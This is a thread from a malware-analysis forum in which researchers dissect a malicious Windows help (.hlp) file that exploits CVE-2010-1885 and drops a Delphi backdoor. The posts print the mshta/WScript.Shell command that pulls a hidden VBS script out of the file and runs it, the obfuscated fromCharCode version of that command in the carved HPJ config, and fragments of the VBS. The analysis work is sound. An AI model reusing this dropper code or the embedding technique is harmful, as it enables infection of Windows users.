A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #9360  by GhostLight
 Sat Oct 22, 2011 11:31 am
Here is a innovative method of malware delivery.

The delivery vehicle is a windows .hlp file, that contains a embedded VBS script as a comment.
If anyone manages to extract this scrip with normal tools such as "uniextract" please let me know. (I simply copied it from c:\a.vbs)

When opened the help script engine runs mshta.exe with the following parameters:
new ActiveXObject('WSCRIPT.SHELL').RUN('CMD /C FOR /F "USEBACKQDELIMS=" %I IN (`DIR/B *.HLP`)DO FINDSTR /B INT3 "%I">C:/A.VBS&C:/A.VBS',0);close()

This will extract the VBS script from the original .hlp file into the c:\A.VBS and run it.

The VBS script then creates the file c:\xml.exe.exe (yes two .exe endings), and runs it.

The Virustotal report for xml.exe.exe is http://www.virustotal.com/file-scan/rep ... 1319203716
Attachments
PW: Infected
(23.05 KiB) Downloaded 56 times
 #9363  by Evilcry
 Sat Oct 22, 2011 1:31 pm
The .hlp file implements CVE-2010-1885 that's "Vulnerability in Windows Help and Support Center Could Allow Remote Code Execution"

Additional informations here:

http://www.cve.mitre.org/cgi-bin/cvenam ... -2010-1885

Carved files from Gadhafi info.hlp are:

-> GADHAFI INFO.HPJ
-> GADHAFI INFO.RTF
-> Gadhafi info_Reconstructed.rtf

GADHAFI INFO.HPJ contains:
Code: Select all
[OPTIONS]

LCID=0x409 0x0 0x0

COMPRESS=0



[CONFIG]

EF("mshta.exe",`javascript:eval(String.fromCharCode(110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,67,82,73,80,84,46,83,72,69,76,76,39,41,46,82,85,78,40,39,67,77,68,32,47,67,32,70,79,82,32,47,70,32,34,85,83,69,66,65,67,75,81,68,69,76,73,77,83,61,34,32,37,73,32,73,78,32,40,96,68,73,82,47,66,32,42,46,72,76,80,96,41,68,79,32,70,73,78,68,83,84,82,32,47,66,32,73,78,84,51,32,34,37,73,34,62,67,58,47,65,46,86,66,83,38,67,58,47,65,46,86,66,83,39,44,48,41,59,99,108,111,115,101,40,41))',0)



[FILES]

GADHAFI INFO.RTF
By printing strings of Gadhafi info.hlp you can carve VBS too, it starts with:
INT3:Function INT3():WScript.Sleep(1):End Function:on error resume next:bs
and ends in this way:
CreateObject("WScript.Shell").Run "cmd /c del "&WScript.ScriptFullName
Hope this helps.
 #9368  by EP_X0FF
 Sat Oct 22, 2011 4:15 pm
Extracted actual payload attached, UPX removed. Delphi Backdoor Misdat aka backtsaleht (facepalm, they mean backsilent of course, but it is still facepalm, since it's backdoor).

http://www.virustotal.com/file-scan/rep ... 1319299233
Attachments
pass: malware
(19.57 KiB) Downloaded 47 times
 #9371  by Buster_BSA
 Sun Oct 23, 2011 11:05 am
GhostLight wrote:If anyone manages to extract this scrip with normal tools such as "uniextract" please let me know. (I simply copied it from c:\a.vbs)
I have a tool that will extract the script but it´s not normal, it´s a custom extraction tool I coded myself.